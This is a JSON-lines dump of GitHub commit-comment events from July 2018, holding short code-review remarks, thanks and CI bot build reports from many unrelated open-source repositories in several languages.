{"id":"7998298140","type":"CommitCommentEvent","actor":{"login":"VladimirAlexiev"},"repo":{"name":"ngyikp/json-viewer"},"payload":{"comment":{"id":29787907,"position":null,"line":null,"path":null,"commit_id":"6b5fa84b6bebe9275ac3fa949a4e8a0e9876a565","created_at":"2018-07-21T08:55:32Z","updated_at":"2018-07-21T08:55:32Z","author_association":"NONE","body":"https://github.com/tulios/json-viewer/pull/209"}},"created_at":"2018-07-21T08:55:32Z"}
{"id":"7998298563","type":"CommitCommentEvent","actor":{"login":"Souravirus"},"repo":{"name":"imacubsfan23/plots2"},"payload":{"comment":{"id":29787909,"position":null,"line":null,"path":null,"commit_id":"d4e1cfd9d2602745a58a99d81bc6b045d786fac2","created_at":"2018-07-21T08:55:56Z","updated_at":"2018-07-21T08:55:56Z","author_association":"NONE","body":"Yeah it would be great to move the files to scripts folder. Go ahead @imacubsfan23. "}},"created_at":"2018-07-21T08:55:56Z"}
{"id":"7998306900","type":"CommitCommentEvent","actor":{"login":"wangjianquan136"},"repo":{"name":"wayss000/PracticeCode"},"payload":{"comment":{"id":29787921,"position":null,"line":null,"path":null,"commit_id":"2f025da5a76c4947de45c5cb438f93e23c2be0eb","created_at":"2018-07-21T09:02:48Z","updated_at":"2018-07-21T09:02:48Z","author_association":"NONE","body":"谢谢你"}},"created_at":"2018-07-21T09:02:48Z"}
{"id":"7998310616","type":"CommitCommentEvent","actor":{"login":"fomalsd"},"repo":{"name":"unitystation/unitystation"},"payload":{"comment":{"id":29787926,"position":4,"line":53,"path":"UnityProject/Assets/Scripts/UI/UI Bottom/ControlAction.cs","commit_id":"32cdd032516d6aaa7ea8b5b3a0100356f6d707fc","created_at":"2018-07-21T09:05:55Z","updated_at":"2018-07-21T09:05:55Z","author_association":"CONTRIBUTOR","body":"Why not use UIManager global focus flag here?"}},"created_at":"2018-07-21T09:05:55Z"}
{"id":"7998314086","type":"CommitCommentEvent","actor":{"login":"asdense"},"repo":{"name":"asdense/asdense.github.io"},"payload":{"comment":{"id":29787931,"position":4,"line":102,"path":"2018/07/21/hello-world/index.html","commit_id":"fbafb89d191bc834aa20bc3b7881b46063d03960","created_at":"2018-07-21T09:08:59Z","updated_at":"2018-07-21T09:08:59Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-21T09:08:59Z"}
{"id":"7998314127","type":"CommitCommentEvent","actor":{"login":"Ethanng329"},"repo":{"name":"team-woof/doggy-app"},"payload":{"comment":{"id":29787932,"position":null,"line":null,"path":null,"commit_id":"c61c7bc15843164041a0dc359c7abab228adf2fd","created_at":"2018-07-21T09:09:01Z","updated_at":"2018-07-21T09:09:01Z","author_association":"CONTRIBUTOR","body":"found this few lines on my laptop. for your reference if you are not comfortable with git"}},"created_at":"2018-07-21T09:09:01Z"}
{"id":"7998314674","type":"CommitCommentEvent","actor":{"login":"asdense"},"repo":{"name":"asdense/asdense.github.io"},"payload":{"comment":{"id":29787934,"position":48,"line":136,"path":"index.html","commit_id":"fbafb89d191bc834aa20bc3b7881b46063d03960","created_at":"2018-07-21T09:09:32Z","updated_at":"2018-07-21T09:09:32Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-21T09:09:32Z"}
{"id":"7998314971","type":"CommitCommentEvent","actor":{"login":"asdense"},"repo":{"name":"asdense/asdense.github.io"},"payload":{"comment":{"id":29787935,"position":null,"line":null,"path":null,"commit_id":"fbafb89d191bc834aa20bc3b7881b46063d03960","created_at":"2018-07-21T09:09:48Z","updated_at":"2018-07-21T09:09:48Z","author_association":"OWNER","body":"that's ok, just data-url"}},"created_at":"2018-07-21T09:09:48Z"}
{"id":"7998317329","type":"CommitCommentEvent","actor":{"login":"asdense"},"repo":{"name":"asdense/asdense.github.io"},"payload":{"comment":{"id":29787938,"position":4,"line":102,"path":"2018/07/21/hello-world/index.html","commit_id":"fbafb89d191bc834aa20bc3b7881b46063d03960","created_at":"2018-07-21T09:11:57Z","updated_at":"2018-07-21T09:11:57Z","author_association":"OWNER","body":"TEST"}},"created_at":"2018-07-21T09:11:57Z"}
{"id":"7998318051","type":"CommitCommentEvent","actor":{"login":"Davidc2525"},"repo":{"name":"Davidc2525/SucreCloud"},"payload":{"comment":{"id":29787939,"position":5,"line":14,"path":"src/App/elements/API/v1/Api.js","commit_id":"63e552c268cf788e0afb322d8062432ff9a7d408","created_at":"2018-07-21T09:12:36Z","updated_at":"2018-07-21T09:12:36Z","author_association":"OWNER","body":"host donde corre SucreCloudBackend"}},"created_at":"2018-07-21T09:12:36Z"}
{"id":"7998318297","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29787942,"position":null,"line":null,"path":null,"commit_id":"60c2860e0903a4ac1b11a56f5b19201e370d13a9","created_at":"2018-07-21T09:12:45Z","updated_at":"2018-07-21T09:12:45Z","author_association":"MEMBER","body":"close #11392"}},"created_at":"2018-07-21T09:12:45Z"}
{"id":"7998319355","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29787947,"position":null,"line":null,"path":null,"commit_id":"46f043d28f5bda2f83f2bf827c65a2c32d56e252","created_at":"2018-07-21T09:13:45Z","updated_at":"2018-07-21T09:13:45Z","author_association":"CONTRIBUTOR","body":"Please don't, this is pretty inconsistent with other usages in binding (`command`s, `resource`s)."}},"created_at":"2018-07-21T09:13:45Z"}
{"id":"7998319596","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787949,"position":6,"line":5,"path":"Lesson_1/area_triangle.rb","commit_id":"82640af6f8a1c3ae52c1648872a9a785bb5328f1","created_at":"2018-07-21T09:13:59Z","updated_at":"2018-07-21T09:13:59Z","author_association":"NONE","body":"по первой переменной я подсказал название, а по остальным не подсказал\r\nну и ты решил не менять )))\r\nвторая переменная - высота, третья - площадь (подсказываю ;) )"}},"created_at":"2018-07-21T09:13:59Z"}
{"id":"7998320459","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29787952,"position":null,"line":null,"path":null,"commit_id":"46f043d28f5bda2f83f2bf827c65a2c32d56e252","created_at":"2018-07-21T09:14:47Z","updated_at":"2018-07-21T09:14:47Z","author_association":"CONTRIBUTOR","body":"And does this API come with any benefit, it's not at all stronger that standard `IServiceProvider`"}},"created_at":"2018-07-21T09:14:47Z"}
{"id":"7998320709","type":"CommitCommentEvent","actor":{"login":"mondalaci"},"repo":{"name":"UltimateHackingKeyboard/firmware"},"payload":{"comment":{"id":29787954,"position":14,"line":326,"path":"right/src/usb_report_updater.c","commit_id":"a2866feb77f5a79b99824381c02715b12ace52e9","created_at":"2018-07-21T09:15:01Z","updated_at":"2018-07-21T09:15:01Z","author_association":"MEMBER","body":"@eltang You were supposed to use `if (TestUsbStack) {` here."}},"created_at":"2018-07-21T09:15:01Z"}
{"id":"7998321224","type":"CommitCommentEvent","actor":{"login":"huangdenghe"},"repo":{"name":"mtdhb/api"},"payload":{"comment":{"id":29787959,"position":19,"line":19,"path":"src/main/java/com/mtdhb/api/util/Synchronizes.java","commit_id":"5e869aa94e05e97427fcea4cec2a679b8d38639b","created_at":"2018-07-21T09:15:25Z","updated_at":"2018-07-21T09:15:25Z","author_association":"MEMBER","body":"感谢你的指出，这种方式确实不是一个很好的做法。但是随着 Java 的升级，这种方式也没有想象中的那么糟。Java6 对 synchronized 进行了各种优化，有些情况下它就并不那么重。Java7、Java8 中对 String.intern 的优化，可以参考 [String.intern in Java 6, 7 and 8 – string pooling](http://java-performance.info/string-intern-in-java-6-7-8/)"}},"created_at":"2018-07-21T09:15:25Z"}
{"id":"7998324338","type":"CommitCommentEvent","actor":{"login":"K0zka"},"repo":{"name":"kerubistan/kerub"},"payload":{"comment":{"id":29787962,"position":null,"line":null,"path":null,"commit_id":"c51f6d9bdd4639c6ce7eee0a4cfd62681e0e58db","created_at":"2018-07-21T09:18:06Z","updated_at":"2018-07-21T09:18:06Z","author_association":"COLLABORATOR","body":"more dumb..."}},"created_at":"2018-07-21T09:18:06Z"}
{"id":"7998324673","type":"CommitCommentEvent","actor":{"login":"browncrane"},"repo":{"name":"kochedykov/jlibmodbus"},"payload":{"comment":{"id":29787963,"position":107,"line":107,"path":"examples/com/invertor/examples/modbus/SimpleSlaveTCP.java","commit_id":"9bc4059167a9877834993d483a1073f40f0fa3a3","created_at":"2018-07-21T09:18:22Z","updated_at":"2018-07-21T09:18:22Z","author_association":"CONTRIBUTOR","body":"Email sent."}},"created_at":"2018-07-21T09:18:22Z"}
{"id":"7998324741","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787964,"position":15,"line":15,"path":"Lesson_1/right_triangle.rb","commit_id":"82640af6f8a1c3ae52c1648872a9a785bb5328f1","created_at":"2018-07-21T09:18:27Z","updated_at":"2018-07-21T09:18:27Z","author_association":"NONE","body":"вторая часть проверки здесь лишняя\r\nпотому что если он прямоугольный и равнобедренный, то это отсеется в 13 строке, т.е. до этой строки прямоугольный и равнобедренный не дойдет"}},"created_at":"2018-07-21T09:18:27Z"}
{"id":"7998324876","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm-samples-dependencyinjection"},"payload":{"comment":{"id":29787965,"position":21,"line":21,"path":"Autofac/OWINAutofacSample/AutofacStaticCommandServiceLoader.cs","commit_id":"906a232738e7d57ba57758f9be8d0cfac692f1ef","created_at":"2018-07-21T09:18:35Z","updated_at":"2018-07-21T09:18:35Z","author_association":"NONE","body":"Why would you? This is the same as using the build-in `IServiceProvider`"}},"created_at":"2018-07-21T09:18:35Z"}
{"id":"7998325442","type":"CommitCommentEvent","actor":{"login":"mayzam80203"},"repo":{"name":"mayzam80203/esp8266rele"},"payload":{"comment":{"id":29787966,"position":null,"line":null,"path":null,"commit_id":"b3bf064c40899f2e300d2a4efd99e8968876bbf7","created_at":"2018-07-21T09:19:04Z","updated_at":"2018-07-21T09:19:04Z","author_association":"OWNER","body":"код для arduino ide"}},"created_at":"2018-07-21T09:19:04Z"}
{"id":"7998325794","type":"CommitCommentEvent","actor":{"login":"antoineco"},"repo":{"name":"kubernetes/ingress-nginx"},"payload":{"comment":{"id":29787967,"position":8,"line":44,"path":"test/e2e/framework/deployment.go","commit_id":"3ce0ad988fac83132dfa8ffc6668c4551a00e3bf","created_at":"2018-07-21T09:19:24Z","updated_at":"2018-07-21T09:19:24Z","author_association":"CONTRIBUTOR","body":":+1:"}},"created_at":"2018-07-21T09:19:24Z"}
{"id":"7998326127","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29787970,"position":11,"line":11,"path":"Lesson_1/right_triangle.rb","commit_id":"82640af6f8a1c3ae52c1648872a9a785bb5328f1","created_at":"2018-07-21T09:19:44Z","updated_at":"2018-07-21T09:19:44Z","author_association":"NONE","body":"вторая часть проверки лишняя, уже писал в прошлый раз:\r\n\r\n> если треугольник прямоугольный и его катеты равны, то он равнобедренный и при этом прямоугольный треугольник не может быть равносторонним, поэтому последняя проверка не имеет смысла"}},"created_at":"2018-07-21T09:19:44Z"}
{"id":"7998326219","type":"CommitCommentEvent","actor":{"login":"seanlip"},"repo":{"name":"oppia/oppia"},"payload":{"comment":{"id":29787971,"position":43,"line":229,"path":"core/storage/question/gae_models.py","commit_id":"0796a96b302a91a3e3c4ed4ad673ec71adb9a54e","created_at":"2018-07-21T09:19:49Z","updated_at":"2018-07-21T09:19:49Z","author_association":"MEMBER","body":"Oh, I just realized the possible issue with empty string. Wouldn't passing that in as a \"next cursor\" mean \"0 results have been fetched\"?"}},"created_at":"2018-07-21T09:19:49Z"}
{"id":"7998327427","type":"CommitCommentEvent","actor":{"login":"tomasherceg"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29787976,"position":null,"line":null,"path":null,"commit_id":"46f043d28f5bda2f83f2bf827c65a2c32d56e252","created_at":"2018-07-21T09:20:53Z","updated_at":"2018-07-21T09:20:53Z","author_association":"CONTRIBUTOR","body":"In OWIN, IServiceProvider is used to resolve DotVVM dependencies only. If anyone wants to use his own container, there is no reasonable way to resolve static command services from the container - the containers on OWIN (at least Autofac which one of our customers is using) don't have an API that would integrate it in IServiceProvider. \r\nIn OWIN, you are not even able to implement your own IServiceProvider and make DotVVM use it, so you can make the integration yourself, and there is also only one place where you can configure services for it - DotvvmStartup, which is also quite inconvenient. "}},"created_at":"2018-07-21T09:20:53Z"}
{"id":"7998327586","type":"CommitCommentEvent","actor":{"login":"calvarus"},"repo":{"name":"calvarus/propagon"},"payload":{"comment":{"id":29787977,"position":null,"line":null,"path":null,"commit_id":"36f74898256b38b2a4ac6dc30433b98e18c971d5","created_at":"2018-07-21T09:21:02Z","updated_at":"2018-07-21T09:21:02Z","author_association":"OWNER","body":"Návrat k verzi 2"}},"created_at":"2018-07-21T09:21:02Z"}
{"id":"7998327872","type":"CommitCommentEvent","actor":{"login":"m0unt4inm0nk"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29787978,"position":8,"line":25,"path":"collections/devops-tools/index.md","commit_id":"6108ce9d66bb6861a40cd2d578e2fbccd2743ad4","created_at":"2018-07-21T09:21:17Z","updated_at":"2018-07-21T09:21:17Z","author_association":"NONE","body":"- sweetsalt/digital-inv\r\n"}},"created_at":"2018-07-21T09:21:17Z"}
{"id":"7998337665","type":"CommitCommentEvent","actor":{"login":"Paulchen-Panther"},"repo":{"name":"abrenoch/hyperion-android-grabber"},"payload":{"comment":{"id":29787996,"position":72,"line":130,"path":"common/src/main/java/com/abrenoch/hyperiongrabber/common/network/Hyperion.java","commit_id":"8e5b0b86e5f6b33ac2bcceb1d5e297773bf7774d","created_at":"2018-07-21T09:29:43Z","updated_at":"2018-07-21T09:29:43Z","author_association":"COLLABORATOR","body":"You could convert this place into a debug output so that it does not exist in the release build.\r\nhttps://tekeye.uk/android/examples/android-debug-vs-release-build"}},"created_at":"2018-07-21T09:29:43Z"}
{"id":"7998341471","type":"CommitCommentEvent","actor":{"login":"joshmh"},"repo":{"name":"lamassu/lamassu-machine"},"payload":{"comment":{"id":29788002,"position":null,"line":null,"path":null,"commit_id":"da21fb8dc5c8ac28481ac6439013966bf24ccf2d","created_at":"2018-07-21T09:33:07Z","updated_at":"2018-07-21T09:33:07Z","author_association":"MEMBER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Puloon path undefined](https://trello.com/c/SWITyRj2/575-puloon-path-undefined)"}},"created_at":"2018-07-21T09:33:07Z"}
{"id":"7998342549","type":"CommitCommentEvent","actor":{"login":"romanoh"},"repo":{"name":"ialejandro/filebot-compiler"},"payload":{"comment":{"id":29788004,"position":null,"line":null,"path":null,"commit_id":"892b6b854d8830288170a34af9906fecf954cbbf","created_at":"2018-07-21T09:34:05Z","updated_at":"2018-07-21T09:34:05Z","author_association":"NONE","body":"Thank you for your work"}},"created_at":"2018-07-21T09:34:05Z"}
{"id":"7998342615","type":"CommitCommentEvent","actor":{"login":"tomasherceg"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29788005,"position":null,"line":null,"path":null,"commit_id":"46f043d28f5bda2f83f2bf827c65a2c32d56e252","created_at":"2018-07-21T09:34:08Z","updated_at":"2018-07-21T09:34:08Z","author_association":"CONTRIBUTOR","body":"I can see the only other usage of GetService here: https://github.com/riganti/dotvvm/blob/0a2f84ec6fd15d321d8fab42b8f616c36105431c/src/DotVVM.Framework/Compilation/ControlTree/BindingExtensionParameter.cs#L126 \r\n\r\nAdding the extensibility point here should make the behavior consistent in command and resource bindings. "}},"created_at":"2018-07-21T09:34:08Z"}
{"id":"7998346592","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29788017,"position":null,"line":null,"path":null,"commit_id":"46f043d28f5bda2f83f2bf827c65a2c32d56e252","created_at":"2018-07-21T09:37:33Z","updated_at":"2018-07-21T09:37:33Z","author_association":"CONTRIBUTOR","body":"> In OWIN, you are not even able to implement your own IServiceProvider and make DotVVM use it, so you can make the integration yourself\r\n\r\nOK, this is pretty stupid IMO. Solving this problem generally would be much better, the DI container is used at a lot places (injection to control/viewmodels/binding) and you'll have to implement at least these 3 interfaces to get it consistent with custom DI container."}},"created_at":"2018-07-21T09:37:33Z"}
{"id":"7998347290","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29788019,"position":null,"line":null,"path":null,"commit_id":"46f043d28f5bda2f83f2bf827c65a2c32d56e252","created_at":"2018-07-21T09:38:11Z","updated_at":"2018-07-21T09:38:11Z","author_association":"CONTRIBUTOR","body":"> Adding the extensibility point here should make the behavior consistent in command and resource bindings.\r\n\r\nProbably."}},"created_at":"2018-07-21T09:38:11Z"}
{"id":"7998348891","type":"CommitCommentEvent","actor":{"login":"zwcloud"},"repo":{"name":"zwcloud/ImGui"},"payload":{"comment":{"id":29788021,"position":null,"line":null,"path":null,"commit_id":"c0f0cbeca850955d6f332a876560c5c0d03e42b8","created_at":"2018-07-21T09:39:37Z","updated_at":"2018-07-21T09:39:37Z","author_association":"OWNER","body":"But the merged text mesh is actually correct:\r\n\r\n(Saved as an obj file and opened with FBX Review.)\r\n![image](https://user-images.githubusercontent.com/6965758/43034324-f4af1dd8-8d0c-11e8-997f-fd85c5ee98bf.png)\r\n"}},"created_at":"2018-07-21T09:39:37Z"}
{"id":"7998352480","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29788030,"position":null,"line":null,"path":null,"commit_id":"84926cd6457df04ce3826cd585a27cecf99291b3","created_at":"2018-07-21T09:42:51Z","updated_at":"2018-07-21T09:42:51Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2320 of 2323 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * OTHER_FAULT: 1\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\nZoneUnitarySystemTest Test Summary\n * Passed: 7\n * OTHER_FAULT: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-84926cd6457df04ce3826cd585a27cecf99291b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-84926cd6457df04ce3826cd585a27cecf99291b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-84926cd6457df04ce3826cd585a27cecf99291b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.03%25-green.png)</a>\n"}},"created_at":"2018-07-21T09:42:51Z"}
{"id":"7998352875","type":"CommitCommentEvent","actor":{"login":"zKoz210"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29788031,"position":null,"line":null,"path":null,"commit_id":"93a2f397c6f0e5f35ffe0f7e19c0379ffbbf5b54","created_at":"2018-07-21T09:43:14Z","updated_at":"2018-07-21T09:43:14Z","author_association":"CONTRIBUTOR","body":"@dktapps Will there be any hacks on the nametags? Or need to wait for 1.5.2? Sorry for flood, it's important to hear it from you."}},"created_at":"2018-07-21T09:43:14Z"}
{"id":"7998353590","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone-react"},"payload":{"comment":{"id":29788032,"position":null,"line":null,"path":null,"commit_id":"b1bdceed64b931fb58739726bfeafaa5297ca287","created_at":"2018-07-21T09:43:56Z","updated_at":"2018-07-21T09:43:56Z","author_association":"NONE","body":"Rob Gietema your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-21T09:43:56Z"}
{"id":"7998354012","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29788034,"position":null,"line":null,"path":null,"commit_id":"84926cd6457df04ce3826cd585a27cecf99291b3","created_at":"2018-07-21T09:44:18Z","updated_at":"2018-07-21T09:44:18Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-84926cd6457df04ce3826cd585a27cecf99291b3-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-21T09:44:18Z"}
{"id":"7998354419","type":"CommitCommentEvent","actor":{"login":"aumbadgah"},"repo":{"name":"docker-library/httpd"},"payload":{"comment":{"id":29788036,"position":null,"line":null,"path":null,"commit_id":"17166574dea6a8c574443fc3a06bdb5a8bc97743","created_at":"2018-07-21T09:44:43Z","updated_at":"2018-07-21T09:44:43Z","author_association":"NONE","body":"@oskapt thank you! I wonder why this wasn't considered a breaking change"}},"created_at":"2018-07-21T09:44:43Z"}
{"id":"7998354747","type":"CommitCommentEvent","actor":{"login":"mskwarczek"},"repo":{"name":"mskwarczek/task-8-4"},"payload":{"comment":{"id":29788037,"position":51,"line":51,"path":"js/script.js","commit_id":"89a3f483e0e45f72d25266de3271050d2be83cae","created_at":"2018-07-21T09:45:02Z","updated_at":"2018-07-21T09:45:02Z","author_association":"OWNER","body":"Skojarzyłem takie tablice z teorii gier i uznałem, że to będzie całkiem ok i łatwe do ewentualnej rozbudowy. W Kodilli raczej nic takiego nie było."}},"created_at":"2018-07-21T09:45:02Z"}
{"id":"7998355728","type":"CommitCommentEvent","actor":{"login":"kochedykov"},"repo":{"name":"kochedykov/jlibmodbus"},"payload":{"comment":{"id":29788043,"position":107,"line":107,"path":"examples/com/invertor/examples/modbus/SimpleSlaveTCP.java","commit_id":"9bc4059167a9877834993d483a1073f40f0fa3a3","created_at":"2018-07-21T09:45:52Z","updated_at":"2018-07-21T09:45:52Z","author_association":"OWNER","body":"I got the email. So I think it would be better to use the simplest approach: invoke notifyAll in the shutdown method. If we use more than one slave, so we can apply the observer pattern to be notified if a slave is shut down. "}},"created_at":"2018-07-21T09:45:52Z"}
{"id":"7998358651","type":"CommitCommentEvent","actor":{"login":"tomasherceg"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29788046,"position":null,"line":null,"path":null,"commit_id":"46f043d28f5bda2f83f2bf827c65a2c32d56e252","created_at":"2018-07-21T09:48:42Z","updated_at":"2018-07-21T09:48:42Z","author_association":"CONTRIBUTOR","body":"I agree and would like to have it in DotVVM 2.1 (or 3.0) - I am not sure whether this can be done without a breaking change.\r\nHowever, one of the customers needs a solution now, so I need this extensibility point. Conceptually, it is similar to ViewModelLoader which we already have.\r\nThe last remaining piece is the dependency injection in controls, but I think that it can wait until the next release - we use it solely to inject DotVVM services in controls which are already in IServiceProvider."}},"created_at":"2018-07-21T09:48:42Z"}
{"id":"7998359837","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29788048,"position":null,"line":null,"path":null,"commit_id":"46f043d28f5bda2f83f2bf827c65a2c32d56e252","created_at":"2018-07-21T09:49:51Z","updated_at":"2018-07-21T09:49:51Z","author_association":"CONTRIBUTOR","body":"It's insanely stupid to add public API just to hack a bigger problem."}},"created_at":"2018-07-21T09:49:51Z"}
{"id":"7998360119","type":"CommitCommentEvent","actor":{"login":"anithya"},"repo":{"name":"anithya/ccna_security"},"payload":{"comment":{"id":29788049,"position":null,"line":null,"path":null,"commit_id":"342bcaae907139b55c8f02b65f501a9c23bece85","created_at":"2018-07-21T09:50:07Z","updated_at":"2018-07-21T09:50:07Z","author_association":"OWNER","body":"bookmark 1"}},"created_at":"2018-07-21T09:50:07Z"}
{"id":"7998361374","type":"CommitCommentEvent","actor":{"login":"Davidc2525"},"repo":{"name":"Davidc2525/SucreCloudBackend"},"payload":{"comment":{"id":29788052,"position":42,"line":43,"path":"src/main/java/orchi/SucreCloud/operations/DownloadOperation.java","commit_id":"79bd21104a02febe99f9826fb9453f5af7dd8b63","created_at":"2018-07-21T09:51:10Z","updated_at":"2018-07-21T09:51:10Z","author_association":"OWNER","body":"Cambiar nombre de variable de yetPaths a validPaths "}},"created_at":"2018-07-21T09:51:10Z"}
{"id":"7998361599","type":"CommitCommentEvent","actor":{"login":"mskwarczek"},"repo":{"name":"mskwarczek/task-8-4"},"payload":{"comment":{"id":29788054,"position":81,"line":81,"path":"js/script.js","commit_id":"89a3f483e0e45f72d25266de3271050d2be83cae","created_at":"2018-07-21T09:51:21Z","updated_at":"2018-07-21T09:51:21Z","author_association":"OWNER","body":"Jasna sprawa, już poprawiłem"}},"created_at":"2018-07-21T09:51:21Z"}
{"id":"7998361717","type":"CommitCommentEvent","actor":{"login":"mskwarczek"},"repo":{"name":"mskwarczek/task-8-4"},"payload":{"comment":{"id":29788055,"position":88,"line":88,"path":"js/script.js","commit_id":"89a3f483e0e45f72d25266de3271050d2be83cae","created_at":"2018-07-21T09:51:28Z","updated_at":"2018-07-21T09:51:28Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-21T09:51:28Z"}
{"id":"7998361888","type":"CommitCommentEvent","actor":{"login":"neverbackdown81"},"repo":{"name":"dlrudie/Snip"},"payload":{"comment":{"id":29788056,"position":null,"line":null,"path":null,"commit_id":"f56ee27fceb30858c38102a224277c27611c9ebb","created_at":"2018-07-21T09:51:38Z","updated_at":"2018-07-21T09:51:38Z","author_association":"NONE","body":"brilliant cant wait hopefully iit works all good again when is download link available please"}},"created_at":"2018-07-21T09:51:38Z"}
{"id":"7998362179","type":"CommitCommentEvent","actor":{"login":"birkenfeld"},"repo":{"name":"birkenfeld/stm32-eth"},"payload":{"comment":{"id":29788057,"position":null,"line":null,"path":null,"commit_id":"998b7961a5911276d6c0387b6752e3da865fe5cd","created_at":"2018-07-21T09:51:56Z","updated_at":"2018-07-21T09:51:56Z","author_association":"OWNER","body":"By the way, many many thanks for writing this in the first place, together with the DHCP code for smoltcp it allowed me to write a little tester board in basically no time."}},"created_at":"2018-07-21T09:51:56Z"}
{"id":"7998362230","type":"CommitCommentEvent","actor":{"login":"janschreiber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29788059,"position":null,"line":null,"path":null,"commit_id":"caa0470caaa92a8a99b2af29a1506b2b771c42b0","created_at":"2018-07-21T09:51:58Z","updated_at":"2018-07-21T09:51:58Z","author_association":"MEMBER","body":"Fix for broken build 4a416c175df347d9981b81dd61c3dba7c3a2aa30"}},"created_at":"2018-07-21T09:51:58Z"}
{"id":"7998362238","type":"CommitCommentEvent","actor":{"login":"exyi"},"repo":{"name":"riganti/dotvvm"},"payload":{"comment":{"id":29788060,"position":null,"line":null,"path":null,"commit_id":"46f043d28f5bda2f83f2bf827c65a2c32d56e252","created_at":"2018-07-21T09:51:59Z","updated_at":"2018-07-21T09:51:59Z","author_association":"CONTRIBUTOR","body":"For controls, you can use a custom loader. But for controls and viewModels there is a stronger API that allows you to initialize the control/viewModel in any way you want, not only using constructor injection, so it makes IMHO sense to have it. This is completely redundant."}},"created_at":"2018-07-21T09:51:59Z"}
{"id":"7998365037","type":"CommitCommentEvent","actor":{"login":"Igor1101"},"repo":{"name":"Igor1101/THUNDERSTORM"},"payload":{"comment":{"id":29788067,"position":null,"line":null,"path":null,"commit_id":"79a18a113a2543bedf76772dfa6f89be13da90a4","created_at":"2018-07-21T09:54:35Z","updated_at":"2018-07-21T09:54:35Z","author_association":"OWNER","body":"Now we can compile kernel without Wno-unused-variable flag!"}},"created_at":"2018-07-21T09:54:35Z"}
{"id":"7998365182","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29788068,"position":null,"line":null,"path":null,"commit_id":"baceb8693d268c14bea7cdbe419d9d434f26c95c","created_at":"2018-07-21T09:54:43Z","updated_at":"2018-07-21T09:54:43Z","author_association":"OWNER","body":"Thanks ! \r\n@crossbr the test was against #1686, so no problem here"}},"created_at":"2018-07-21T09:54:43Z"}
{"id":"7998365424","type":"CommitCommentEvent","actor":{"login":"Mikhael-Danilov"},"repo":{"name":"NYRDS/pixel-dungeon-remix"},"payload":{"comment":{"id":29788069,"position":null,"line":null,"path":null,"commit_id":"d7bec7bf73811aa01cefc70594733f5c848903db","created_at":"2018-07-21T09:54:56Z","updated_at":"2018-07-21T09:54:56Z","author_association":"CONTRIBUTOR","body":"man_no_hands.png should just replace man.png"}},"created_at":"2018-07-21T09:54:56Z"}
